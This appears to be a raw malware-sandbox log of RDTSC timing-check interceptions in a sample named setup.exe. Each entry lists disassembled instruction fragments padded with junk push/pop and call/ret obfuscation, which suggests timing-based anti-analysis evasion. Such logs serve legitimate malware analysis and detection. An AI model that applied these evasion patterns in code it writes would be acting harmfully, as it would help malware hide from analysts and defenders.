Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 528F1F second address: 528F25 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 528F25 second address: 528F73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 jmp 00007FEA5CDC3A28h 0x0000000d je 00007FEA5CDC3A16h 0x00000013 popad 0x00000014 je 00007FEA5CDC3A2Fh 0x0000001a jo 00007FEA5CDC3A1Eh 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 52954D second address: 529557 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007FEA5C6FB9E6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 529557 second address: 52957C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA5CDC3A25h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jns 00007FEA5CDC3A16h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 52957C second address: 529580 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 529580 second address: 529586 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5296FF second address: 529705 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 52985C second address: 529862 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 529862 second address: 529866 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 52FBD9 second address: 52FBDD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 52FBDD second address: 52FBE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5301D2 second address: 5301D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5301D8 second address: 5301FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FEA5C6FB9F1h 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 push ebx 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5301FA second address: 530207 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop ebx 0x00000006 mov eax, dword ptr [eax] 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 530207 second address: 53020B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4F02F1 second address: 4F02FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FEA5CDC3A16h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4F02FD second address: 4F0349 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEA5C6FB9F9h 0x00000009 popad 0x0000000a jmp 00007FEA5C6FB9F9h 0x0000000f push esi 0x00000010 jmp 00007FEA5C6FB9F2h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5349E6 second address: 5349EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 533FDE second address: 533FF1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FEA5C6FB9EEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 534585 second address: 53458B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 53458B second address: 53458F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 53649F second address: 5364A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5364A3 second address: 5364B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 pushad 0x00000009 jc 00007FEA5C6FB9ECh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5364B4 second address: 5364E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEA5CDC3A1Eh 0x00000009 popad 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e jmp 00007FEA5CDC3A24h 0x00000013 mov eax, dword ptr [eax] 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 push edi 0x0000001a pop edi 0x0000001b rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5364E7 second address: 5364F1 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FEA5C6FB9E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5364F1 second address: 536538 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FEA5CDC3A20h 0x00000008 push eax 0x00000009 pop eax 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp+04h], eax 0x00000011 jp 00007FEA5CDC3A2Fh 0x00000017 pop eax 0x00000018 push E2BA31B9h 0x0000001d pushad 0x0000001e pushad 0x0000001f pushad 0x00000020 popad 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 536852 second address: 536857 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 536857 second address: 53685C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 536B1A second address: 536B1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 536FD3 second address: 536FE2 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 53707C second address: 5370AE instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007FEA5C6FB9F8h 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], ebx 0x0000000e clc 0x0000000f sbb si, 6060h 0x00000014 nop 0x00000015 push eax 0x00000016 push edx 0x00000017 jbe 00007FEA5C6FB9E8h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 53724C second address: 537261 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FEA5CDC3A16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b pushad 0x0000000c popad 0x0000000d pop esi 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5374E5 second address: 537501 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEA5C6FB9F8h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 537669 second address: 5376A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007FEA5CDC3A23h 0x0000000d nop 0x0000000e mov esi, dword ptr [ebp+122D3727h] 0x00000014 xchg eax, ebx 0x00000015 ja 00007FEA5CDC3A28h 0x0000001b push eax 0x0000001c pushad 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 537BED second address: 537BF7 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FEA5C6FB9E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 537BF7 second address: 537BFC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5386CC second address: 5386D5 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 53A38E second address: 53A43D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA5CDC3A29h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FEA5CDC3A1Ah 0x0000000f nop 0x00000010 clc 0x00000011 jmp 00007FEA5CDC3A1Fh 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push edx 0x0000001b call 00007FEA5CDC3A18h 0x00000020 pop edx 0x00000021 mov dword ptr [esp+04h], edx 0x00000025 add dword ptr [esp+04h], 0000001Ch 0x0000002d inc edx 0x0000002e push edx 0x0000002f ret 0x00000030 pop edx 0x00000031 ret 0x00000032 jmp 00007FEA5CDC3A28h 0x00000037 push 00000000h 0x00000039 push 00000000h 0x0000003b push eax 0x0000003c call 00007FEA5CDC3A18h 0x00000041 pop eax 0x00000042 mov dword ptr [esp+04h], eax 0x00000046 add dword ptr [esp+04h], 0000001Dh 0x0000004e inc eax 0x0000004f push eax 0x00000050 ret 0x00000051 pop eax 0x00000052 ret 0x00000053 mov dword ptr [ebp+122D264Fh], eax 0x00000059 xchg eax, ebx 0x0000005a js 00007FEA5CDC3A24h 0x00000060 push eax 0x00000061 push edx 0x00000062 push eax 0x00000063 push edx 0x00000064 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 53A43D second address: 53A441 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 53A441 second address: 53A469 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jg 00007FEA5CDC3A16h 0x00000010 jmp 00007FEA5CDC3A27h 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 53B8EE second address: 53B8F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 540E36 second address: 540E3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 542310 second address: 542314 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 542314 second address: 542323 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b pop eax 0x0000000c push eax 0x0000000d pop eax 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5433BA second address: 543425 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FEA5C6FB9F7h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp], eax 0x00000010 mov edi, dword ptr [ebp+122D3015h] 0x00000016 push 00000000h 0x00000018 mov di, bx 0x0000001b movzx edi, bx 0x0000001e push 00000000h 0x00000020 push 00000000h 0x00000022 push esi 0x00000023 call 00007FEA5C6FB9E8h 0x00000028 pop esi 0x00000029 mov dword ptr [esp+04h], esi 0x0000002d add dword ptr [esp+04h], 00000017h 0x00000035 inc esi 0x00000036 push esi 0x00000037 ret 0x00000038 pop esi 0x00000039 ret 0x0000003a push eax 0x0000003b push eax 0x0000003c push edx 0x0000003d pushad 0x0000003e jmp 00007FEA5C6FB9F3h 0x00000043 pushad 0x00000044 popad 0x00000045 popad 0x00000046 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 53CDE5 second address: 53CE02 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA5CDC3A1Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 push esi 0x00000015 pop esi 0x00000016 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 543425 second address: 54342A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 53CE02 second address: 53CE06 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 53CE06 second address: 53CE23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FEA5C6FB9F5h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 544445 second address: 544452 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jnl 00007FEA5CDC3A16h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5425E5 second address: 5425EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5425EA second address: 542601 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007FEA5CDC3A16h 0x00000009 push esi 0x0000000a pop esi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 547588 second address: 54758E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 54567E second address: 545682 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 54758E second address: 5475EE instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push ecx 0x0000000e call 00007FEA5C6FB9E8h 0x00000013 pop ecx 0x00000014 mov dword ptr [esp+04h], ecx 0x00000018 add dword ptr [esp+04h], 00000018h 0x00000020 inc ecx 0x00000021 push ecx 0x00000022 ret 0x00000023 pop ecx 0x00000024 ret 0x00000025 push 00000000h 0x00000027 jbe 00007FEA5C6FB9EAh 0x0000002d mov bx, C206h 0x00000031 push 00000000h 0x00000033 jmp 00007FEA5C6FB9EEh 0x00000038 mov di, dx 0x0000003b xchg eax, esi 0x0000003c jmp 00007FEA5C6FB9EFh 0x00000041 push eax 0x00000042 pushad 0x00000043 push eax 0x00000044 push edx 0x00000045 push eax 0x00000046 push edx 0x00000047 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 545682 second address: 545686 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5475EE second address: 5475F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 544683 second address: 544687 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 544687 second address: 54468B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 54468B second address: 544691 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 54879C second address: 5487A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 547848 second address: 54784F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 54784F second address: 547855 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 547855 second address: 547859 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 547859 second address: 54785D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 54A754 second address: 54A76A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA5CDC3A22h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 54A76A second address: 54A770 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 54A770 second address: 54A790 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c jmp 00007FEA5CDC3A23h 0x00000011 pop edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 54B66F second address: 54B673 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 54F5DD second address: 54F646 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push esi 0x0000000b call 00007FEA5CDC3A18h 0x00000010 pop esi 0x00000011 mov dword ptr [esp+04h], esi 0x00000015 add dword ptr [esp+04h], 00000019h 0x0000001d inc esi 0x0000001e push esi 0x0000001f ret 0x00000020 pop esi 0x00000021 ret 0x00000022 push eax 0x00000023 mov ebx, 09A224CBh 0x00000028 pop ebx 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push esi 0x0000002e call 00007FEA5CDC3A18h 0x00000033 pop esi 0x00000034 mov dword ptr [esp+04h], esi 0x00000038 add dword ptr [esp+04h], 0000001Ah 0x00000040 inc esi 0x00000041 push esi 0x00000042 ret 0x00000043 pop esi 0x00000044 ret 0x00000045 mov ebx, dword ptr [ebp+122D36BBh] 0x0000004b sub dword ptr [ebp+122D2E26h], edi 0x00000051 push 00000000h 0x00000053 stc 0x00000054 xchg eax, esi 0x00000055 push eax 0x00000056 push edx 0x00000057 pushad 0x00000058 push eax 0x00000059 push edx 0x0000005a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 54F646 second address: 54F65F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEA5C6FB9F4h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 54B83D second address: 54B857 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FEA5CDC3A1Ch 0x00000008 jns 00007FEA5CDC3A16h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 pushad 0x00000012 jc 00007FEA5CDC3A1Ch 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 54B857 second address: 54B85F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5506FF second address: 550703 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 550703 second address: 55070D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 55070D second address: 550754 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA5CDC3A28h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d call 00007FEA5CDC3A1Ch 0x00000012 or dword ptr [ebp+122D1A9Ah], eax 0x00000018 pop edi 0x00000019 push 00000000h 0x0000001b and di, DB22h 0x00000020 push 00000000h 0x00000022 sbb di, 1C6Eh 0x00000027 push eax 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 550754 second address: 55075B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 549897 second address: 5498A1 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FEA5CDC3A16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5498A1 second address: 5498A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 54E72D second address: 54E731 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 54E731 second address: 54E743 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FEA5C6FB9E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 pop ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 54E743 second address: 54E749 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 54F7FC second address: 54F808 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 54F8E8 second address: 54F8ED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5573AB second address: 5573AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5574EB second address: 5574F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 557644 second address: 557648 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 55777F second address: 557783 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 55B760 second address: 55B773 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FEA5C6FB9E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b mov eax, dword ptr [eax] 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
